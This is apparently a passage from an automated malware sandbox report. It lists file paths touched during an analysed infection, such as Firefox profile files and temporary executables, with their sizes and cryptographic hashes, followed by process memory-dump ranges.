                    SHA512

                    9415de9ad5c8a25cee82f8fa1df2e0c3a05def89b45c4564dc4462e561f54fdcaff7aa0f286426e63da02553e9b46179a0f85c7db03d15de6d497288386b26ac

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\t3xexgw3.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll

                    Filesize

                    10.2MB

                    MD5

                    54dc5ae0659fabc263d83487ae1c03e4

                    SHA1

                    c572526830da6a5a6478f54bc6edb178a4d641f4

                    SHA256

                    43cad5d5074932ad10151184bdee4a493bda0953fe8a0cbe6948dff91e3ad67e

                    SHA512

                    8e8f7b9c7c2ee54749dbc389b0e24722cec0eba7207b7a7d5a1efe99ee8261c4cf708cdbdcca4d72f9a4ada0a1c50c1a46fca2acd189a20a9968ccfdb1cf42d9

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\t3xexgw3.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.lib

                    Filesize

                    1KB

                    MD5

                    688bed3676d2104e7f17ae1cd2c59404

                    SHA1

                    952b2cdf783ac72fcb98338723e9afd38d47ad8e

                    SHA256

                    33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

                    SHA512

                    7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\t3xexgw3.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.sig

                    Filesize

                    1KB

                    MD5

                    dea1586a0ebca332d265dc5eda3c1c19

                    SHA1

                    29e8a8962a3e934fd6a804f9f386173f1b2f9be4

                    SHA256

                    98fbbc41d2143f8131e9b18fe7521f90d306b9ba95546a513c3293916b1fce60

                    SHA512

                    0e1e5e9af0790d38a29e9f1fbda7107c52f162c1503822d8860199c90dc8430b093d09aef74ac45519fb20aedb32c70c077d74a54646730b98e026073cedd0d6

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\t3xexgw3.default-release\prefs-1.js

                    Filesize

                    6KB

                    MD5

                    998bfa0a6d2e380f3dbda8f4383fbbb3

                    SHA1

                    b725ea9d1cd295630e3f85b04c07a938df3138e6

                    SHA256

                    21b7d07cba4e26631cf8cb0ff9342966655cb625f2401c61526efc4ec0fec74e

                    SHA512

                    c772c397934f5fea81dce643b3b334499265432facfb8834bfc10d039a787bf00bc543ae67d4fb56a1193902dcb89dea7fde49732c915328649c6f4e37876ee3

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\t3xexgw3.default-release\prefs-1.js

                    Filesize

                    7KB

                    MD5

                    8aede450af3223ddc09c6571b66dff89

                    SHA1

                    e0b860cbdfd5089d789f35a58b2ee7ff7cce38ba

                    SHA256

                    7ce333c9ec4605da35a1035d324a5692220aa1e64b4fa1fbd3cb6eb2cd207006

                    SHA512

                    9ac1877c2a859960521abe66b34e56daca6d26ae20854e998b9e0aa5b589e3c84f21d0ff62a41d86addb76e1f23493d23ed3414fd79ad430884b75301d027cd9

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\t3xexgw3.default-release\prefs.js

                    Filesize

                    6KB

                    MD5

                    eeeb7e22ea1c0c7e9c46a401445dcb65

                    SHA1

                    0e6a9abd2c5d6af617779b9c749164bf3aa7b3bf

                    SHA256

                    760f82e8896fbd0e016efa650eda2fa978ae92048f680768dc72b749b9fdf91e

                    SHA512

                    2aaff834e48bfacd6170fa62345dcd64ae851ce639ed53a1f752c3cb7e6f4605f4b7d15cfeea7811c743be85233323a9cd8fd489c76c450161211dc243857b65

                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\t3xexgw3.default-release\sessionstore-backups\recovery.jsonlz4

                    Filesize

                    4KB

                    MD5

                    7559779b0d0ed02f87c494b525f08243

                    SHA1

                    b19c6664f5bcad5be104a75b761451f825924bac

                    SHA256

                    5ffa6a9859da78808721cdf8d77e5c127508073c59718c2163dd59458336a8e5

                    SHA512

                    14213e1382d7344ee024fcba5e5580b19845da4c09190a649f1ba0b25232072b18d62259533099be377454bebef3906fac92f6f80cdaa0f04944abd7851a8ae7

                  • C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe

                    Filesize

                    446KB

                    MD5

                    4d20b83562eec3660e45027ad56fb444

                    SHA1

                    ff6134c34500a8f8e5881e6a34263e5796f83667

                    SHA256

                    c5e650b331fa5292872fdaede3a75c8167a0f1280ce0cd3d58b880d23854bdb1

                    SHA512

                    718bd66fcff80b8008a4523d88bd726cdbc95e6e7bdb3f50e337e291294505ed54e6f5995d431968b85415e96f6f7ed37381ca021401ad57fda3b08a1f0c27f4

                  • \Users\Admin\AppData\Local\Temp\_MEI21882\api-ms-win-core-file-l1-2-0.dll

                    Filesize

                    11KB

                    MD5

                    5a72a803df2b425d5aaff21f0f064011

                    SHA1

                    4b31963d981c07a7ab2a0d1a706067c539c55ec5

                    SHA256

                    629e52ba4e2dca91b10ef7729a1722888e01284eed7dda6030d0a1ec46c94086

                    SHA512

                    bf44997c405c2ba80100eb0f2ff7304938fc69e4d7ae3eac52b3c236c3188e80c9f18bda226b5f4fde0112320e74c198ad985f9ffd7cea99aca22980c39c7f69

                  • \Users\Admin\AppData\Local\Temp\_MEI21882\api-ms-win-core-file-l2-1-0.dll

                    Filesize

                    11KB

                    MD5

                    721b60b85094851c06d572f0bd5d88cd

                    SHA1

                    4d0ee4d717aeb9c35da8621a545d3e2b9f19b4e7

                    SHA256

                    dac867476caa42ff8df8f5dfe869ffd56a18dadee17d47889afb69ed6519afbf

                    SHA512

                    430a91fcecde4c8cc4ac7eb9b4c6619243ab244ee88c34c9e93ca918e54bd42b08aca8ea4475d4c0f5fa95241e4aacb3206cbae863e92d15528c8e7c9f45601b

                  • \Users\Admin\AppData\Local\Temp\_MEI21882\api-ms-win-core-localization-l1-2-0.dll

                    Filesize

                    14KB

                    MD5

                    1ed0b196ab58edb58fcf84e1739c63ce

                    SHA1

                    ac7d6c77629bdee1df7e380cc9559e09d51d75b7

                    SHA256

                    8664222823e122fca724620fd8b72187fc5336c737d891d3cef85f4f533b8de2

                    SHA512

                    e1fa7f14f39c97aaa3104f3e13098626b5f7cfd665ba52dcb2312a329639aaf5083a9177e4686d11c4213e28acc40e2c027988074b6cc13c5016d5c5e9ef897b

                  • \Users\Admin\AppData\Local\Temp\_MEI21882\api-ms-win-core-processthreads-l1-1-1.dll

                    Filesize

                    11KB

                    MD5

                    7e8b61d27a9d04e28d4dae0bfa0902ed

                    SHA1

                    861a7b31022915f26fb49c79ac357c65782c9f4b

                    SHA256

                    1ef06c600c451e66e744b2ca356b7f4b7b88ba2f52ec7795858d21525848ac8c

                    SHA512

                    1c5b35026937b45beb76cb8d79334a306342c57a8e36cc15d633458582fc8f7d9ab70ace7a92144288c6c017f33ecfc20477a04432619b40a21c9cda8d249f6d

                  • \Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

                    Filesize

                    2.1MB

                    MD5

                    d9f00ea479721f7581810bda98dca097

                    SHA1

                    0b438eab56eb426d68bdeb2bd7c6f69af19daca6

                    SHA256

                    53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1

                    SHA512

                    af216b63003175ac1a4a135a242b2b26a31fd49dc9988f822a04a920fb47c27961eeb481bc8bc1c4c25fc9e09f407c7e0ae079210481c515442525707773af55

                  • memory/300-531-0x00000000065B0000-0x0000000006A79000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/1368-649-0x0000000001210000-0x0000000001892000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/1368-651-0x0000000001210000-0x0000000001892000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/1424-586-0x0000000000400000-0x000000000043D000-memory.dmp

                    Filesize

                    244KB

                  • memory/1424-151-0x0000000000400000-0x000000000043D000-memory.dmp

                    Filesize

                    244KB

                  • memory/1424-533-0x0000000060900000-0x0000000060992000-memory.dmp

                    Filesize

                    584KB

                  • memory/1540-378-0x0000000006420000-0x00000000068E9000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/1544-15-0x0000000000040000-0x0000000000509000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/1544-1-0x0000000077320000-0x0000000077322000-memory.dmp

                    Filesize

                    8KB

                  • memory/1544-3-0x0000000000040000-0x0000000000509000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/1544-2-0x0000000000041000-0x00000000000AD000-memory.dmp

                    Filesize

                    432KB

                  • memory/1544-4-0x0000000000040000-0x0000000000509000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/1544-16-0x0000000006DF0000-0x00000000072B9000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/1544-18-0x0000000000041000-0x00000000000AD000-memory.dmp

                    Filesize

                    432KB

                  • memory/1544-0-0x0000000000040000-0x0000000000509000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/1704-327-0x0000000000340000-0x00000000003B8000-memory.dmp

                    Filesize

                    480KB

                  • memory/2088-532-0x0000000000E20000-0x00000000012E9000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2088-566-0x0000000000E20000-0x00000000012E9000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2520-363-0x0000000000400000-0x0000000000465000-memory.dmp

                    Filesize

                    404KB

                  • memory/2520-365-0x0000000000400000-0x0000000000465000-memory.dmp

                    Filesize

                    404KB

                  • memory/2520-360-0x0000000000400000-0x0000000000465000-memory.dmp

                    Filesize

                    404KB

                  • memory/2520-362-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                    Filesize

                    4KB

                  • memory/2520-356-0x0000000000400000-0x0000000000465000-memory.dmp

                    Filesize

                    404KB

                  • memory/2520-352-0x0000000000400000-0x0000000000465000-memory.dmp

                    Filesize

                    404KB

                  • memory/2520-358-0x0000000000400000-0x0000000000465000-memory.dmp

                    Filesize

                    404KB

                  • memory/2520-354-0x0000000000400000-0x0000000000465000-memory.dmp

                    Filesize

                    404KB

                  • memory/2576-379-0x0000000000A10000-0x0000000000ED9000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2576-387-0x0000000000A10000-0x0000000000ED9000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2688-295-0x000007FEF5E40000-0x000007FEF6429000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/2688-399-0x000007FEF5E40000-0x000007FEF6429000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/2796-666-0x0000000000400000-0x0000000000463000-memory.dmp

                    Filesize

                    396KB

                  • memory/2796-670-0x0000000000400000-0x0000000000463000-memory.dmp

                    Filesize

                    396KB

                  • memory/2796-668-0x0000000000400000-0x0000000000463000-memory.dmp

                    Filesize

                    396KB

                  • memory/2796-674-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

                    Filesize

                    4KB

                  • memory/2796-664-0x0000000000400000-0x0000000000463000-memory.dmp

                    Filesize

                    396KB

                  • memory/2796-672-0x0000000000400000-0x0000000000463000-memory.dmp

                    Filesize

                    396KB

                  • memory/2796-676-0x0000000000400000-0x0000000000463000-memory.dmp

                    Filesize

                    396KB

                  • memory/2796-675-0x0000000000400000-0x0000000000463000-memory.dmp

                    Filesize

                    396KB

                  • memory/2832-50-0x0000000000891000-0x00000000008FD000-memory.dmp

                    Filesize

                    432KB

                  • memory/2832-1156-0x0000000003E00000-0x0000000003E3D000-memory.dmp

                    Filesize

                    244KB

                  • memory/2832-677-0x0000000000890000-0x0000000000D59000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2832-374-0x0000000000890000-0x0000000000D59000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2832-647-0x00000000065F0000-0x0000000006C72000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/2832-648-0x00000000065F0000-0x0000000006C72000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/2832-698-0x00000000065F0000-0x0000000006C72000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/2832-520-0x00000000065F0000-0x0000000006A9C000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/2832-575-0x0000000000890000-0x0000000000D59000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2832-266-0x00000000065F0000-0x0000000006A93000-memory.dmp

                    Filesize

                    4.6MB

                  • memory/2832-17-0x0000000000890000-0x0000000000D59000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2832-594-0x0000000000890000-0x0000000000D59000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2832-604-0x00000000065F0000-0x0000000006A9C000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/2832-1155-0x0000000003E00000-0x0000000003E3D000-memory.dmp

                    Filesize

                    244KB

                  • memory/2832-650-0x0000000000890000-0x0000000000D59000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2832-856-0x00000000065F0000-0x0000000006A56000-memory.dmp

                    Filesize

                    4.4MB

                  • memory/2832-858-0x00000000065F0000-0x0000000006A56000-memory.dmp

                    Filesize

                    4.4MB

                  • memory/2832-153-0x00000000065F0000-0x0000000006A93000-memory.dmp

                    Filesize

                    4.6MB

                  • memory/2832-20-0x0000000000890000-0x0000000000D59000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2832-19-0x0000000000891000-0x00000000008FD000-memory.dmp

                    Filesize

                    432KB

                  • memory/2832-152-0x0000000000890000-0x0000000000D59000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2832-883-0x0000000000890000-0x0000000000D59000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2832-148-0x0000000003E00000-0x0000000003E3D000-memory.dmp

                    Filesize

                    244KB

                  • memory/2832-906-0x00000000065F0000-0x0000000006A56000-memory.dmp

                    Filesize

                    4.4MB

                  • memory/2832-23-0x0000000000890000-0x0000000000D59000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2832-22-0x0000000000890000-0x0000000000D59000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2832-24-0x0000000000890000-0x0000000000D59000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2832-25-0x0000000000890000-0x0000000000D59000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2832-49-0x0000000000890000-0x0000000000D59000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2832-149-0x0000000003E00000-0x0000000003E3D000-memory.dmp

                    Filesize

                    244KB

                  • memory/2832-51-0x0000000000890000-0x0000000000D59000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/2832-67-0x00000000065F0000-0x0000000006A93000-memory.dmp

                    Filesize

                    4.6MB

                  • memory/2832-69-0x00000000065F0000-0x0000000006A93000-memory.dmp

                    Filesize

                    4.6MB

                  • memory/2932-521-0x0000000000340000-0x00000000007EC000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/2932-633-0x0000000000340000-0x00000000007EC000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/2932-623-0x0000000000340000-0x00000000007EC000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/2932-678-0x0000000000340000-0x00000000007EC000-memory.dmp

                    Filesize

                    4.7MB

                  • memory/2992-68-0x0000000000E70000-0x0000000001313000-memory.dmp

                    Filesize

                    4.6MB

                  • memory/2992-313-0x0000000000E70000-0x0000000001313000-memory.dmp

                    Filesize

                    4.6MB

                  • memory/2992-154-0x00000000003B0000-0x00000000003B5000-memory.dmp

                    Filesize

                    20KB

                  • memory/2992-913-0x0000000000E70000-0x0000000001313000-memory.dmp

                    Filesize

                    4.6MB

                  • memory/2992-526-0x0000000000E70000-0x0000000001313000-memory.dmp

                    Filesize

                    4.6MB

                  • memory/2992-642-0x0000000000E70000-0x0000000001313000-memory.dmp

                    Filesize

                    4.6MB

                  • memory/2992-167-0x0000000000E70000-0x0000000001313000-memory.dmp

                    Filesize

                    4.6MB

                  • memory/2992-155-0x00000000003B0000-0x00000000003B5000-memory.dmp

                    Filesize

                    20KB

                  • memory/2992-824-0x0000000000E70000-0x0000000001313000-memory.dmp

                    Filesize

                    4.6MB

                  • memory/3416-914-0x00000000009F0000-0x0000000000E56000-memory.dmp

                    Filesize

                    4.4MB

                  • memory/3416-857-0x00000000009F0000-0x0000000000E56000-memory.dmp

                    Filesize

                    4.4MB

                  • memory/3416-863-0x00000000009F0000-0x0000000000E56000-memory.dmp

                    Filesize

                    4.4MB

                  • memory/3416-864-0x00000000009F0000-0x0000000000E56000-memory.dmp

                    Filesize

                    4.4MB

                  • memory/3416-928-0x00000000009F0000-0x0000000000E56000-memory.dmp

                    Filesize

                    4.4MB

                  • memory/3628-929-0x0000000000EA0000-0x000000000189F000-memory.dmp

                    Filesize

                    10.0MB

                  • memory/3768-934-0x0000000000400000-0x000000000042F000-memory.dmp

                    Filesize

                    188KB

                  • memory/4032-1315-0x0000000000A80000-0x0000000000A90000-memory.dmp

                    Filesize

                    64KB

                  • memory/4032-1317-0x00000000059F0000-0x0000000005B50000-memory.dmp

                    Filesize

                    1.4MB

                  • memory/4032-2640-0x0000000005E20000-0x0000000005EDA000-memory.dmp

                    Filesize

                    744KB

                  • memory/4032-2641-0x0000000005EE0000-0x0000000005F96000-memory.dmp

                    Filesize

                    728KB

                  • memory/4032-2642-0x0000000004A80000-0x0000000004ACC000-memory.dmp

                    Filesize

                    304KB